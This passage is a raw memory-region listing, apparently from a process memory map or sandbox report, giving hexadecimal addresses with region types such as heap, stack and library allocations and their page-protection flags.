page read and write
16196ABB000
heap
page read and write
2B245A10000
heap
page read and write
7FF886CF0000
trusted library allocation
page read and write
1443BC4A000
heap
page read and write
23B63620000
trusted library allocation
page read and write
1619720E000
heap
page read and write
26491070000
heap
page read and write
7FF8869B0000
trusted library allocation
page read and write
16196A8F000
heap
page read and write
161970C6000
heap
page read and write
16197123000
heap
page read and write
16194C14000
heap
page read and write
2157034A000
heap
page read and write
1619721D000
heap
page read and write
14AACCE8000
heap
page read and write
25B5B5BA000
heap
page read and write
B4CE17E000
stack
page read and write
16197067000
heap
page read and write
16197390000
heap
page read and write
14D22620000
heap
page read and write
161970F4000
heap
page read and write
1F5A5FB7000
heap
page read and write
28180087000
trusted library allocation
page read and write
161971DE000
heap
page read and write
2AC3D880000
heap
page read and write
16196D21000
heap
page read and write
1619711C000
heap
page read and write
299AFFCA000
heap
page read and write
16196D63000
heap
page read and write
16197311000
heap
page read and write
7FF71D2B1000
unkown
page execute read
161971FF000
heap
page read and write
7FF8E7316000
unkown
page execute and read and write
161973D6000
heap
page read and write
26491102000
heap
page read and write
27AD7DB000
stack
page read and write
16196B10000
direct allocation
page read and write
1A7082D0000
heap
page read and write
1443BC36000
heap
page read and write
7FF886B90000
trusted library allocation
page read and write
161970EA000
heap
page read and write
7FF8E75B1000
unkown
page execute and read and write
1D99D980000
heap
page read and write
1619712E000
heap
page read and write
1DB2A353000
heap
page read and write
138E5BCA000
heap
page read and write
161970F4000
heap
page read and write
1273F289000
heap
page read and write
283A4A25000
heap
page read and write
1DB2A353000
heap
page read and write
23B65413000
heap
page read and write
23ADA7E000
stack
page read and write
1619711C000
heap
page read and write
161971FF000
heap
page read and write
14D0870C000
heap
page read and write
23B63424000
heap
page read and write
1F5A9261000
heap
page read and write
138E5DA5000
heap
page read and write
281F0259000
heap
page read and write
16196ABD000
heap
page read and write
1F5A825D000
heap
page read and write
1F5A811A000
heap
page read and write
7FF886C30000
trusted library allocation
page read and write
1619707C000
heap
page read and write
16198420000
direct allocation
page read and write
138E5B95000
heap
page read and write
14AACB7A000
heap
page read and write
25B5B5B7000
heap
page read and write
1F5A5EC9000
heap
page read and write
D71696F000
stack
page read and write
297E1ACD000
heap
page read and write
21570360000
heap
page read and write
14D0B779000
trusted library allocation
page read and write
14AACB70000
heap
page read and write
16196DC1000
heap
page read and write
16196DDF000
heap
page read and write
161970F0000
heap
page read and write
161970F8000
heap
page read and write
25B5AF09000
heap
page read and write
21706321000
heap
page read and write
1F5A5FA2000
heap
page read and write
7FF886CD8000
trusted library allocation
page read and write
16196800000
direct allocation
page read and write
297E1DA5000
heap
page read and write
16196DE1000
heap
page read and write
161970EA000
heap
page read and write
7FF8E7314000
unkown
page execute and read and write
208D7E9A000
heap
page read and write
1443BC76000
heap
page read and write
16197340000
heap
page read and write
14AAC5C5000
heap
page read and write
28180D69000
trusted library allocation
page read and write
161971D0000
heap
page read and write
DD2CEFF000
stack
page read and write
B4CDCFE000
stack
page read and write
7FF8E6B59000
unkown
page execute and read and write
14AAC709000
heap
page read and write
23B634FC000
heap
page read and write
208D7E50000
heap
page read and write
266897B000
stack
page read and write
25B5B711000
heap
page read and write
7FF886D00000
trusted library allocation
page read and write
7FF8869AB000
trusted library allocation
page read and write
1443C302000
heap
page read and write
14AAC700000
heap
page read and write
161971E0000
heap
page read and write
8FD68FC000
stack
page read and write
1DB2A9D9000
heap
page read and write
16196C26000
heap
page read and write
16194D90000
heap
page read and write
281F1F10000
heap
page read and write
16196D74000
heap
page read and write
16196FD6000
heap
page read and write
1273F230000
heap
page read and write
23B65424000
heap
page read and write
1619756E000
heap
page read and write
CD7767F000
stack
page read and write
7FF8E6E21000
unkown
page execute and read and write
162E121D000
heap
page read and write
7FF8E7530000
unkown
page execute and write copy
23B65560000
heap
page read and write
26491127000
heap
page read and write
26491118000
heap
page read and write
16197404000
heap
page read and write
16196D88000
heap
page read and write
23B634F4000
heap
page read and write
16196A59000
heap
page read and write
2170634D000
heap
page read and write
7FF8F8309000
unkown
page execute and read and write
14D2271A000
heap
page read and write
16196D88000
heap
page read and write
23B6347B000
heap
page read and write
16197083000
heap
page read and write
161971DC000
heap
page read and write
281811D8000
trusted library allocation
page read and write
161982F0000
direct allocation
page read and write
1443BDB0000
trusted library allocation
page read and write
1EC1ED1C000
heap
page read and write
13FB8F31000
heap
page read and write
1DAF7C02000
heap
page read and write
16196D12000
heap
page read and write
7FF886B2A000
trusted library allocation
page read and write
217098C0000
direct allocation
page read and write
1FEDCA60000
heap
page read and write
16197214000
heap
page read and write
138E5BC4000
heap
page read and write
1DB2C2F3000
heap
page read and write
1DAF7BE0000
heap
page read and write
281F0500000
heap
page read and write
1619711A000
heap
page read and write
16196DC5000
heap
page read and write
1443DDF0000
heap
page read and write
16196D26000
heap
page read and write
14D0A511000
trusted library allocation
page read and write
1619773C000
heap
page read and write
14AAC5F0000
trusted library allocation
page read and write
1619722E000
heap
page read and write
25B5CFA3000
heap
page read and write
216CFA00000
heap
page read and write
16196A74000
heap
page read and write
281F26E1000
heap
page read and write
1619711A000
heap
page read and write
162E1227000
heap
page read and write
281F2709000
heap
page read and write
217063A0000
heap
page read and write
16196A7F000
heap
page read and write
14AAE56D000
heap
page read and write
1443BC7A000
heap
page read and write
161971E0000
heap
page read and write
7FF886DD0000
trusted library allocation
page read and write
24B52C90000
heap
page read and write
16197214000
heap
page read and write
16198820000
direct allocation
page read and write
14AAC71D000
heap
page read and write
16197105000
heap
page read and write
7FF886D70000
trusted library allocation
page read and write
14AACCF1000
heap
page read and write
25B5B71C000
heap
page read and write
1DAF7C02000
heap
page read and write
1C70FD60000
heap
page read and write
138E5D40000
heap
page read and write
14AACCF4000
heap
page read and write
22630ECA000
heap
page read and write
161975F5000
heap
page read and write
29273AA0000
heap
page read and write
23B63400000
trusted library allocation
page read and write
23B6348E000
heap
page read and write
7FF8E72A1000
unkown
page execute and read and write
2500C130000
heap
page read and write
161973B7000
heap
page read and write
25B5CFAE000
heap
page read and write
299AFF80000
heap
page read and write
23B636B7000
heap
page read and write
25B5B70F000
heap
page read and write
1EC1ED21000
heap
page read and write
1ABF5695000
heap
page read and write
23B634BC000
heap
page read and write
1DB2A369000
heap
page read and write
1619712C000
heap
page read and write
16197214000
heap
page read and write
23B637D0000
heap
page read and write
DD2CDFF000
unkown
page read and write
1619731F000
heap
page read and write
21706323000
heap
page read and write
16197351000
heap
page read and write
B4CD9AF000
stack
page read and write
23B63477000
heap
page read and write
1443BC26000
heap
page read and write
22658FA0000
heap
page read and write
14AAC709000
heap
page read and write
161970F0000
heap
page read and write
1DB2A37E000
heap
page read and write
14CE2549000
heap
page read and write
16197204000
heap
page read and write
1D516861000
heap
page read and write
1619712A000
heap
page read and write
1ABF5697000
heap
page read and write
1A70808B000
heap
page read and write
1FEDCD25000
heap
page read and write
1DB2A9A8000
heap
page read and write
1443BC3D000
heap
page read and write
7FF886C70000
trusted library allocation
page read and write
1F5A9261000
heap
page read and write
1D99D9E5000
heap
page read and write
1DB2A9C9000
heap
page read and write
25B5B729000
heap
page read and write
14D0BE1C000
trusted library allocation
page read and write
7FF8E6D4A000
unkown
page execute and read and write
70CCFF000
stack
page read and write
7FF8F094E000
unkown
page execute and read and write
16197EE4000
direct allocation
page read and write
16197116000
heap
page read and write
19DF8560000
heap
page read and write
23B636C0000
heap
page read and write
16196D11000
heap
page read and write
299AFFE1000
heap
page read and write
7FF8E75CE000
unkown
page execute and read and write
1443BC3D000
heap
page read and write
28181700000
trusted library allocation
page read and write
7FF886A4C000
trusted library allocation
page execute and read and write
16196D26000
heap
page read and write
2819030F000
trusted library allocation
page read and write
1443BBF7000
heap
page read and write
1DB2A353000
heap
page read and write
14A52FF1000
heap
page read and write
1443BDB0000
trusted library allocation
page read and write
16197112000
heap
page read and write
161983FE000
heap
page read and write
1ABF564F000
heap
page read and write
16196A01000
heap
page read and write
B4CEECA000
stack
page read and write
1619721D000
heap
page read and write
29273C90000
heap
page read and write
161970AA000
heap
page read and write
2500C0B0000
heap
page read and write
161982F0000
direct allocation
page read and write
14AACCD4000
heap
page read and write
16198690000
heap
page read and write
161971E0000
heap
page read and write
161975D0000
heap
page read and write
23B63400000
trusted library allocation
page read and write
281F028F000
heap
page read and write
75835FF000
unkown
page read and write
16197616000
heap
page read and write
21706363000
heap
page read and write
1F5A5FA1000
heap
page read and write
25B5B5BA000
heap
page read and write
23B63468000
heap
page read and write
1443C2E4000
heap
page read and write
161983D0000
direct allocation
page read and write
21709930000
direct allocation
page read and write
1619710E000
heap
page read and write
16197620000
heap
page read and write
7FF8E737E000
unkown
page execute and read and write
1619760E000
heap
page read and write
1F5A5F87000
heap
page read and write
281F0210000
heap
page read and write
7FF8F1E05000
unkown
page execute and read and write
162E1226000
heap
page read and write
25B5B71C000
heap
page read and write
16196C10000
heap
page read and write
7FF7B10F0000
unkown
page readonly
16196DD4000
heap
page read and write
25B5B70F000
heap
page read and write
14AAC5A0000
heap
page read and write
25B5AEC7000
heap
page read and write
281F029D000
heap
page read and write
16197421000
heap
page read and write
16196A98000
heap
page read and write
16197116000
heap
page read and write
16198480000
direct allocation
page read and write
2003D4A2000
heap
page read and write
1C70FC20000
heap
page read and write
1DB2C2FE000
heap
page read and write
161983D0000
direct allocation
page read and write
161975E6000
heap
page read and write
14AAC707000
heap
page read and write
1619743B000
heap
page read and write
1273F25B000
heap
page read and write
161970ED000
heap
page read and write
7FF8E6DEF000
unkown
page execute and read and write
16196FBE000
heap
page read and write
281F04E6000
heap
page execute and read and write
7FF886994000
trusted library allocation
page read and write
14AAC700000
heap
page read and write
26491118000
heap
page read and write
7FF7B1133000
unkown
page readonly
16196D11000
heap
page read and write
7FF7B1131000
unkown
page read and write
26491118000
heap
page read and write
3EA4E7F000
stack
page read and write
1DB2A9B4000
heap
page read and write
7FF886C40000
trusted library allocation
page read and write
B143FFF000
unkown
page read and write
1619711F000
heap
page read and write
138E5B60000
heap
page read and write
1CCE83F000
stack
page read and write
70CE7E000
stack
page read and write
7FF8F1E08000
unkown
page read and write
29273AC0000
heap
page read and write
16196D1B000
heap
page read and write
7FF8869A0000
trusted library allocation
page read and write
16196D07000
heap
page read and write
2003D48B000
heap
page read and write
14AAE574000
heap
page read and write
21709932000
direct allocation
page read and write
281F02AF000
heap
page read and write
1273F27D000
heap
page read and write
161970F7000
heap
page read and write
16196A49000
heap
page read and write
1EC1ECD0000
heap
page read and write
1ABF5673000
heap
page read and write
161971E8000
heap
page read and write
1CCE37C000
stack
page read and write
1DB2A35F000
heap
page read and write
1C70FC41000
heap
page read and write
7FF8F0D01000
unkown
page execute and read and write
161983C0000
direct allocation
page read and write
283A48B0000
heap
page read and write
1C071FE000
stack
page read and write
7FF8E752E000
unkown
page execute and read and write
16196DD4000
heap
page read and write
16196ABF000
heap
page read and write
7FF886B40000
trusted library allocation
page execute and read and write
23B6541E000
heap
page read and write
161970F7000
heap
page read and write
16196DC1000
heap
page read and write
2500C11A000
heap
page read and write
2003D4A2000
heap
page read and write
16197110000
heap
page read and write
1443BC7A000
heap
page read and write
1DB2A85A000
heap
page read and write
14AAC6FC000
heap
page read and write
25B5AF14000
heap
page read and write
2170633F000
heap
page read and write
16197162000
heap
page read and write
1619707F000
heap
page read and write
2003D4A2000
heap
page read and write
21707ED0000
direct allocation
page read and write
1DB2A346000
heap
page read and write
ADB8AD7000
stack
page read and write
16196DC5000
heap
page read and write
162E1226000
heap
page read and write
1619722E000
heap
page read and write
1D99D790000
heap
page read and write
16196DDF000
heap
page read and write
16197110000
heap
page read and write
281F04E0000
heap
page execute and read and write
2502EFE000
stack
page read and write
14D22510000
heap
page read and write
1A9A6FF000
stack
page read and write
7FF8F5851000
unkown
page execute and read and write
29273CB0000
heap
page read and write
1619712E000
heap
page read and write
21709840000
direct allocation
page read and write
1EC1ED0F000
heap
page read and write
1CCE7BE000
stack
page read and write
2500C090000
heap
page read and write
1619712E000
heap
page read and write
16196A96000
heap
page read and write
16197224000
heap
page read and write
7FF7B112F000
unkown
page read and write
16198300000
direct allocation
page read and write
1CCE636000
stack
page read and write
FDF9FFF000
stack
page read and write
1A708030000
heap
page read and write
1DB2A9C9000
heap
page read and write
14AAE6E0000
heap
page read and write
21707CF7000
direct allocation
page read and write
162E1226000
heap
page read and write
1F5A5EE8000
heap
page read and write
7FF886A56000
trusted library allocation
page execute and read and write
297E1A30000
heap
page read and write
22E65ED0000
heap
page read and write
16198380000
direct allocation
page read and write
23D53D51000
heap
page read and write
161971B0000
heap
page read and write
25B5B71C000
heap
page read and write
281F1FE2000
heap
page read and write
161973BC000
heap
page read and write
2A158FE000
stack
page read and write
1619729F000
heap
page read and write
7FF7B112F000
unkown
page read and write
16196D26000
heap
page read and write
23589FF000
stack
page read and write
14AACCE8000
heap
page read and write
1D516861000
heap
page read and write
161971E6000
heap
page read and write
1443BC07000
heap
page read and write
217062D0000
heap
page read and write
14AACCD4000
heap
page read and write
161970F8000
heap
page read and write
161970FE000
heap
page read and write
7FF8E729B000
unkown
page read and write
16197224000
heap
page read and write
14AACCD7000
heap
page read and write
16196A05000
heap
page read and write
216CFB90000
heap
page read and write
21709980000
direct allocation
page read and write
26491123000
heap
page read and write
1DB2A372000
heap
page read and write
16197112000
heap
page read and write
161973AD000
heap
page read and write
1CCE2FE000
stack
page read and write
1619725F000
heap
page read and write
1619712C000
heap
page read and write
23B636B0000
heap
page read and write
26491104000
heap
page read and write
7FF8F830B000
unkown
page execute and read and write
1F5A9273000
heap
page read and write
7FF886BE0000
trusted library allocation
page read and write
23B634E5000
heap
page read and write
16196ABB000
heap
page read and write
45A98FC000
stack
page read and write
16196C79000
heap
page read and write
7FF71D35E000
unkown
page readonly
25B5CFA1000
heap
page read and write
2818194D000
trusted library allocation
page read and write
3EA4EFE000
stack
page read and write
1D516859000
heap
page read and write
283A4CD0000
heap
page read and write
25B5B0A0000
trusted library allocation
page read and write
1DB2A37E000
heap
page read and write
161983C0000
direct allocation
page read and write
281F0420000
heap
page read and write
264910E5000
heap
page read and write
7FF71D2B1000
unkown
page execute read
7FF886DE0000
trusted library allocation
page read and write
1EEC7B80000
heap
page read and write
1A81FD50000
heap
page read and write
1619773C000
heap
page read and write
1FEDCB80000
heap
page read and write
23D53F00000
heap
page read and write
14D0A500000
heap
page read and write
1619711F000
heap
page read and write
283A4A1B000
heap
page read and write
16197214000
heap
page read and write
25B5CFB4000
heap
page read and write
21706351000
heap
page read and write
14AAC6E0000
heap
page read and write
7FF886B60000
trusted library allocation
page execute and read and write
27AE38F000
stack
page read and write
7FF8F8301000
unkown
page execute and read and write
1619711C000
heap
page read and write
125BFF000
stack
page read and write
161975F0000
heap
page read and write
2170634C000
heap
page read and write
7FF8E7344000
unkown
page execute and read and write
1DB2A313000
heap
page read and write
1273F1E0000
heap
page read and write
1F5A5FB6000
heap
page read and write
14D0A92D000
trusted library allocation
page read and write
21707EB0000
direct allocation
page read and write
1DB2A290000
heap
page read and write
1F5A5F87000
heap
page read and write
1DB2A9C0000
heap
page read and write
217063AA000
heap
page read and write
14AACCD0000
heap
page read and write
2668CFE000
stack
page read and write
7FF71D339000
unkown
page write copy
1DB2A9C9000
heap
page read and write
1443C2F9000
heap
page read and write
264910F9000
heap
page read and write
16196FEC000
heap
page read and write
16196A98000
heap
page read and write
397B4FF000
stack
page read and write
29273D00000
heap
page read and write
2B245AA1000
heap
page read and write
14AACCC7000
heap
page read and write
23B6349F000
heap
page read and write
161971FB000
heap
page read and write
1F5A7E10000
heap
page read and write
299AFFE1000
heap
page read and write
16196F11000
heap
page read and write
1443BC49000
heap
page read and write
162E2B90000
heap
page read and write
16196DE0000
heap
page read and write
7FF7B112F000
unkown
page write copy
627ECFF000
stack
page read and write
1619755F000
heap
page read and write
7FF8F1DF1000
unkown
page execute and read and write
25B5CFA6000
heap
page read and write
283A4A31000
heap
page read and write
1A81FAEA000
heap
page read and write
16196D08000
heap
page read and write
161983B0000
direct allocation
page read and write
21570360000
heap
page read and write
16197410000
heap
page read and write
7FF8E756A000
unkown
page execute and write copy
1443BC31000
heap
page read and write
16197105000
heap
page read and write
1F5A8112000
heap
page read and write
B4CE37C000
stack
page read and write
1619722E000
heap
page read and write
161975D1000
heap
page read and write
16196AB9000
heap
page read and write
1CCE738000
stack
page read and write
21709800000
direct allocation
page read and write
23B636F2000
heap
page read and write
16196D11000
heap
page read and write
1C154450000
heap
page read and write
25B5AF21000
heap
page read and write
161970CF000
heap
page read and write
161973FD000
heap
page read and write
14D1A58A000
trusted library allocation
page read and write
23B636E9000
heap
page read and write
16197116000
heap
page read and write
7FF886D90000
trusted library allocation
page execute and read and write
1443BF85000
heap
page read and write
161972AF000
heap
page read and write
2003D4A2000
heap
page read and write
25B5B0A0000
trusted library allocation
page read and write
1F5A811D000
heap
page read and write
1EEC7E25000
heap
page read and write
16197225000
heap
page read and write
7FF886B58000
trusted library allocation
page read and write
161970EA000
heap
page read and write
1619711A000
heap
page read and write
1619756E000
heap
page read and write
16196A6A000
heap
page read and write
16197123000
heap
page read and write
161973AA000
heap
page read and write
161971D0000
heap
page read and write
22630EC0000
heap
page read and write
1F5A80D8000
heap
page read and write
299B0220000
heap
page read and write
16197105000
heap
page read and write
162E1226000
heap
page read and write
7FF7B111C000
unkown
page readonly
21570340000
heap
page read and write
161974FC000
heap
page read and write
7FF8E7541000
unkown
page execute and read and write
1DB2A336000
heap
page read and write
161970DE000
heap
page read and write
14D0A91D000
trusted library allocation
page read and write
138E5BBF000
heap
page read and write
1C15428B000
heap
page read and write
1619762A000
heap
page read and write
9B48DFF000
unkown
page read and write
14AACCD0000
heap
page read and write
283A4A31000
heap
page read and write
23B636F2000
heap
page read and write
1F5A8148000
heap
page read and write
162E1226000
heap
page read and write
161970F8000
heap
page read and write
281813A0000
trusted library allocation
page read and write
23B636E9000
heap
page read and write
25B5B71C000
heap
page read and write
1FEDCAA0000
heap
page read and write
7FF8F1DF0000
unkown
page readonly
25B5AEE6000
heap
page read and write
1443C2DC000
heap
page read and write
162E1226000
heap
page read and write
14AACB7A000
heap
page read and write
16196C3B000
heap
page read and write
138E5BCA000
heap
page read and write
16197155000
heap
page read and write
1443BC4A000
heap
page read and write
161970F1000
heap
page read and write
7FF71D344000
unkown
page read and write
7FF8E72A0000
unkown
page readonly
14AAC6D6000
heap
page read and write
16197110000
heap
page read and write
14D086D6000
heap
page read and write
2B245A40000
heap
page read and write
16196DE1000
heap
page read and write
F967FFF000
unkown
page read and write
23B6348E000
heap
page read and write
1848CFA0000
heap
page read and write
2170633D000
heap
page read and write
16197204000
heap
page read and write
1273F27D000
heap
page read and write
281F20E0000
heap
page execute and read and write
161987F0000
trusted library allocation
page read and write
1619712E000
heap
page read and write
7FF886B72000
trusted library allocation
page read and write
16196A59000
heap
page read and write
28180EC6000
trusted library allocation
page read and write
208D7E20000
heap
page read and write
299AFFE1000
heap
page read and write
1273F269000
heap
page read and write
14AAC700000
heap
page read and write
21706309000
heap
page read and write
16197320000
heap
page read and write
B4491FE000
unkown
page read and write
217063B2000
heap
page read and write
16196D63000
heap
page read and write
14AAC620000
heap
page read and write
16196D74000
heap
page read and write
1619707C000
heap
page read and write
7FF88699B000
trusted library allocation
page execute and read and write
2003D5F0000
heap
page read and write
1443BC3D000
heap
page read and write
161975F5000
heap
page read and write
1F5A8041000
heap
page read and write
23B634E4000
heap
page read and write
1DB2A339000
heap
page read and write
16196DC5000
heap
page read and write
165CC757000
heap
page read and write
16196560000
heap
page read and write
22E66050000
heap
page read and write
16197110000
heap
page read and write
1619711F000
heap
page read and write
28181638000
trusted library allocation
page read and write
14AAE574000
heap
page read and write
1619738E000
heap
page read and write
16197462000
heap
page read and write
1619711A000
heap
page read and write
1F5A927C000
heap
page read and write
7FF8E7532000
unkown
page read and write
1619722E000
heap
page read and write
25B5B195000
heap
page read and write
208D7E90000
heap
page read and write
16197600000
heap
page read and write
1E76429D000
heap
page read and write
161973BA000
heap
page read and write
161970C2000
heap
page read and write
23B634E8000
heap
page read and write
1F5A927B000
heap
page read and write
217063AD000
heap
page read and write
13FB8F1A000
heap
page read and write
16198300000
direct allocation
page read and write
CD776FE000
stack
page read and write
217099CD000
direct allocation
page read and write
23B63461000
heap
page read and write
1F5A5F82000
heap
page read and write
7FF886A20000
trusted library allocation
page read and write
16198400000
direct allocation
page read and write
1DB2C2E0000
heap
page read and write
21709760000
direct allocation
page read and write
7FF8E7353000
unkown
page read and write
23B63463000
heap
page read and write
23B636BE000
heap
page read and write
1A81FA50000
heap
page read and write
1DB2A9B8000
heap
page read and write
13FB8F31000
heap
page read and write
16197844000
heap
page read and write
259352C0000
heap
page read and write
16196ABB000
heap
page read and write
1619729F000
heap
page read and write
7FF88698B000
trusted library allocation
page read and write
138E5B96000
heap
page read and write
1DB2A35C000
heap
page read and write
16198300000
direct allocation
page read and write
1443BC31000
heap
page read and write
23B634A6000
heap
page read and write
7FF8E7361000
unkown
page execute and read and write
19DF8690000
heap
page read and write
14D0A585000
trusted library allocation
page read and write
1C70FC37000
heap
page read and write
21570290000
heap
page read and write
1619712E000
heap
page read and write
215702B0000
heap
page read and write
14D08995000
heap
page read and write
1F5A5FB7000
heap
page read and write
1E76429B000
heap
page read and write
23B63495000
heap
page read and write
1443C2DF000
heap
page read and write
1EC1EF55000
heap
page read and write
138E5D60000
heap
page read and write
1EC1ECFB000
heap
page read and write
28180229000
trusted library allocation
page read and write
1F5A9273000
heap
page read and write
16196DD4000
heap
page read and write
7FF886980000
trusted library allocation
page read and write
165CCAC5000
heap
page read and write
1DB2C2F1000
heap
page read and write
1F5A926B000
heap
page read and write
23B636C8000
heap
page read and write
1443C305000
heap
page read and write
14AACB74000
heap
page read and write
1443DC66000
heap
page read and write
7FF886990000
trusted library allocation
page read and write
1F5A78F0000
heap
page read and write
1A9A5FF000
unkown
page read and write
1EC1ECD8000
heap
page read and write
16198350000
direct allocation
page read and write
5DD58FF000
stack
page read and write
1619722E000
heap
page read and write
16197083000
heap
page read and write
217063AA000
heap
page read and write
B1440FF000
stack
page read and write
23B634F3000
heap
page read and write
161972B3000
heap
page read and write
25B5B5BE000
heap
page read and write
161972AF000
heap
page read and write
161987C0000
direct allocation
page read and write
7FF886CA0000
trusted library allocation
page read and write
161987A0000
direct allocation
page read and write
7FF8E6E25000
unkown
page execute and write copy
23B637DB000
heap
page read and write
14CE2541000
heap
page read and write
1FEDCA99000
heap
page read and write
1443BC77000
heap
page read and write
2818150E000
trusted library allocation
page read and write
1619722E000
heap
page read and write
25935341000
heap
page read and write
16197116000
heap
page read and write
2170633F000
heap
page read and write
16198300000
direct allocation
page read and write
16196C6F000
heap
page read and write
25B5CFA0000
heap
page read and write
CD7735E000
stack
page read and write
16196A48000
heap
page read and write
1443BC3A000
heap
page read and write
7FF8E7564000
unkown
page execute and read and write
1273F255000
heap
page read and write
1EEC7B70000
heap
page read and write
24B52B00000
heap
page read and write
161971DC000
heap
page read and write
16197172000
heap
page read and write
1F5A827A000
heap
page read and write
7FF8E6B6D000
unkown
page execute and read and write
14AAC712000
heap
page read and write
16197105000
heap
page read and write
1DB2A850000
heap
page read and write
299AFFDA000
heap
page read and write
23B634B3000
heap
page read and write
A5B78FF000
stack
page read and write
16196FF5000
heap
page read and write
1619731C000
heap
page read and write
1DB2A376000
heap
page read and write
161970C6000
heap
page read and write
2502CD4000
stack
page read and write
16197634000
heap
page read and write
1F5A5EEA000
heap
page read and write
1619720D000
heap
page read and write
1443BC56000
heap
page read and write
14AACCCE000
heap
page read and write
16197634000
heap
page read and write
25B5AE80000
heap
page read and write
B9ECAFC000
stack
page read and write
16196FEA000
heap
page read and write
23B634F6000
heap
page read and write
14D09FF0000
trusted library allocation
page read and write
1DB2A9C9000
heap
page read and write
16196E02000
heap
page read and write
1EEC7BDB000
heap
page read and write
14D0A010000
trusted library allocation
page read and write
161970A9000
heap
page read and write
138E5BBE000
heap
page read and write
16197458000
heap
page read and write
7FF8E78F4000
unkown
page execute and read and write
1443BC87000
heap
page read and write
16197231000
heap
page read and write
23B636BA000
heap
page read and write
23B63476000
heap
page read and write
13FB8F31000
heap
page read and write
16197B30000
direct allocation
page read and write
1DB2C2F4000
heap
page read and write
16197123000
heap
page read and write
25B5AF0A000
heap
page read and write
14CE253A000
heap
page read and write
16196D11000
heap
page read and write
14D0BDF1000
trusted library allocation
page read and write
1273F27D000
heap
page read and write
7FF886C20000
trusted library allocation
page read and write
16197434000
heap
page read and write
1619721D000
heap
page read and write
7FF8E7299000
unkown
page execute and write copy
1619712A000
heap
page read and write
7FF886DB0000
trusted library allocation
page read and write
1C06DF6000
stack
page read and write
217099C9000
direct allocation
page read and write
1F5A5FA1000
heap
page read and write
1EC1ED29000
heap
page read and write
14D08970000
heap
page read and write
B143EFC000
stack
page read and write
1443BC31000
heap
page read and write
25B5AF17000
heap
page read and write
16196D4C000
heap
page read and write
2170639A000
heap
page read and write
7FF7B10F0000
unkown
page readonly
25B5AEB0000
heap
page read and write
7FF8E7BB9000
unkown
page execute and write copy
7FF886CE9000
trusted library allocation
page read and write
1F5A8D59000
heap
page read and write
1F5A9263000
heap
page read and write
16197105000
heap
page read and write
14D2266C000
heap
page read and write
217062A0000
heap
page read and write
25935341000
heap
page read and write
7DF4F68E0000
trusted library allocation
page execute and read and write
161970C6000
heap
page read and write
2003D5E0000
heap
page read and write
2818150A000
trusted library allocation
page read and write
1F5A5EC0000
heap
page read and write
1F5A9CA8000
heap
page read and write
1619711A000
heap
page read and write
1F5A5F41000
heap
page read and write
13FB8F29000
heap
page read and write
7FF886B41000
trusted library allocation
page read and write
ADB8E7F000
stack
page read and write
161970A6000
heap
page read and write
1443BC85000
heap
page read and write
25B5CFA2000
heap
page read and write
25B5AEC2000
heap
page read and write
1C70FC41000
heap
page read and write
7E2FCFF000
stack
page read and write
23B636F5000
heap
page read and write
1ABF564B000
heap
page read and write
1D516AD5000
heap
page read and write
16197602000
heap
page read and write
23B634DB000
heap
page read and write
161971E0000
heap
page read and write
14AACCF9000
heap
page read and write
138E5BCA000
heap
page read and write
161983E0000
direct allocation
page read and write
14D0BB13000
trusted library allocation
page read and write
1619712E000
heap
page read and write
1F5A8110000
heap
page read and write
162E1221000
heap
page read and write
14CE2549000
heap
page read and write
21709780000
direct allocation
page read and write
14D2262D000
heap
page read and write
14CE2420000
heap
page read and write
71355FF000
stack
page read and write
1C1545B0000
heap
page read and write
2170632A000
heap
page read and write
16196A64000
heap
page read and write
14D0A080000
trusted library allocation
page read and write
16198320000
direct allocation
page read and write
7FF8F0D15000
unkown
page execute and read and write
26491124000
heap
page read and write
433B17E000
stack
page read and write
7FF886973000
trusted library allocation
page execute and read and write
7FF886D00000
trusted library allocation
page read and write
26491118000
heap
page read and write
7FF8E71E2000
unkown
page execute and read and write
161970C6000
heap
page read and write
14AAC6F2000
heap
page read and write
281F2705000
heap
page read and write
1DB2A36B000
heap
page read and write
7FF8F9D60000
unkown
page readonly
28190031000
trusted library allocation
page read and write
1D516861000
heap
page read and write
14D227E0000
heap
page execute and read and write
162E1226000
heap
page read and write
1DB2A2A0000
heap
page read and write
93B430C000
stack
page read and write
16198380000
direct allocation
page read and write
1619712C000
heap
page read and write
138E5BBE000
heap
page read and write
7F09ACC000
stack
page read and write
7FF8F9D77000
unkown
page readonly
23ADC7F000
stack
page read and write
B4492FF000
stack
page read and write
23B4F3C0000
heap
page read and write
1DAF7BF8000
heap
page read and write
2B245A8A000
heap
page read and write
1D99D7BD000
heap
page read and write
2003D498000
heap
page read and write
138E5BC1000
heap
page read and write
16197214000
heap
page read and write
161971FE000
heap
page read and write
16196C15000
heap
page read and write
162E1226000
heap
page read and write
14D085A0000
heap
page read and write
1619712C000
heap
page read and write
23B63454000
heap
page read and write
161973B7000
heap
page read and write
ADB8F7E000
stack
page read and write
16197364000
heap
page read and write
16197F88000
direct allocation
page read and write
14AAC4C0000
heap
page read and write
1443BC36000
heap
page read and write
A5B76FB000
stack
page read and write
1619720E000
heap
page read and write
283A4A31000
heap
page read and write
281F26D7000
heap
page read and write
1A708087000
heap
page read and write
217063BB000
heap
page read and write
23B636F9000
heap
page read and write
161974FC000
heap
page read and write
25B5AF2C000
heap
page read and write
23B63481000
heap
page read and write
162E1233000
heap
page read and write
14D086A0000
heap
page read and write
28181513000
trusted library allocation
page read and write
1EEC7BF1000
heap
page read and write
208D7E30000
heap
page read and write
217097E0000
direct allocation
page read and write
1619712C000
heap
page read and write
16198310000
direct allocation
page read and write
16196DCF000
heap
page read and write
16197629000
heap
page read and write
161970C2000
heap
page read and write
16196D48000
heap
page read and write
281F265B000
heap
page read and write
7FF886B4A000
trusted library allocation
page read and write
2003D460000
heap
page read and write
29273AAA000
heap
page read and write
19DF8760000
heap
page read and write
161975EC000
heap
page read and write
138E5B9B000
heap
page read and write
7FF8F6DAA000
unkown
page execute and write copy
7FF8E7BBB000
unkown
page read and write
7FF886C80000
trusted library allocation
page read and write
EF2710C000
stack
page read and write
14AACCF9000
heap
page read and write
16196D07000
heap
page read and write
1F5A5F82000
heap
page read and write
2003D380000
heap
page read and write
16196C47000
heap
page read and write
A2BF8FF000
stack
page read and write
299AFFE1000
heap
page read and write
16196C11000
heap
page read and write
25B5B080000
heap
page read and write
13FB9010000
heap
page read and write
1443BF80000
heap
page read and write
7FF8F6DA9000
unkown
page execute and read and write
16196CCB000
heap
page read and write
7FF8E7B40000
unkown
page execute and read and write
22E66055000
heap
page read and write
1443C2E8000
heap
page read and write
1CCE8BE000
stack
page read and write
1619720E000
heap
page read and write
14AAE56D000
heap
page read and write
1DB2A853000
heap
page read and write
161983E0000
direct allocation
page read and write
281F25A2000
heap
page read and write
1D51684A000
heap
page read and write
45A99FF000
unkown
page read and write
14D09FD0000
trusted library allocation
